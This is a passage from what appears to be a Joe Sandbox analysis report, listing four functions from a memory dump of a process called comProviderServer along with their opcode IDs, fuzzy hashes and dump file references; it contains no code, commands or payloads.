              • Instruction Fuzzy Hash: 4D218370D1AE09CAFB98DB68C445AFDB6F1AF45300F508879D00DE6291DE78A908CBD1
              Function 00007FFAAC3F05D8 Relevance: .1, Instructions: 59COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 42594d84b2f91f4d3960b92e75299238e71da6f19390f5202de1a45a731329bc
              • Instruction ID: 8a64fc67a8c7d2d44e2bd2075481490ef9759bccf2aa5fdf4736b283924fd4f6
              • Opcode Fuzzy Hash: 42594d84b2f91f4d3960b92e75299238e71da6f19390f5202de1a45a731329bc
              • Instruction Fuzzy Hash: 2D11B230809F4D8FEB49EF24D4659BA7BA1FF5A300F1188BED40DDB192CA35A554C790
              Function 00007FFAAC3F0608 Relevance: .0, Instructions: 42COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: aba1bae8ec60535ce0ecb51e359db6e5fc1a2c236b89eb2cd29e59632b51a9d8
              • Instruction ID: d692d37362a776871c095ae6a06de24606156349457a91635ed61658b767a039
              • Opcode Fuzzy Hash: aba1bae8ec60535ce0ecb51e359db6e5fc1a2c236b89eb2cd29e59632b51a9d8
              • Instruction Fuzzy Hash: 82016230915E0DDBEB58EB34C458AB976A0FF19305F508C7EE40EC6192DE36E198C690
              Function 00007FFAAC3F2768 Relevance: .0, Instructions: 29COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5a120bb5a0c7206c27013a3504d3183a814d65a7dec2b7e5fce2881e09ac812b
              • Instruction ID: 0b544410db962d7ebe40a512a6e8f39e0d34ef7c415d8008ab82e9e1d596ba25
              • Opcode Fuzzy Hash: 5a120bb5a0c7206c27013a3504d3183a814d65a7dec2b7e5fce2881e09ac812b
              • Instruction Fuzzy Hash: C4F05E3181AB4ECAFB589B24C4546B9BA90FF06200F448C7DE40E85192DA35A158C680
              Function 00007FFAAC3F0FAB Relevance: .0, Instructions: 14COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9c465088ff3c01741cf9383d971a505969ef3f79282738ef9a82615f4534af06
              • Instruction ID: 63fc3a9a1ed32706aa54e47990d7ec8be1f94e2c2613d34f7d2d9d848a4e4e67
              • Opcode Fuzzy Hash: 9c465088ff3c01741cf9383d971a505969ef3f79282738ef9a82615f4534af06
              • Instruction Fuzzy Hash: 6AE0EC70D1AA09CAF750EB28CC10FADA6B1BF55304F1081B5D00EE72A6CE74AD458F90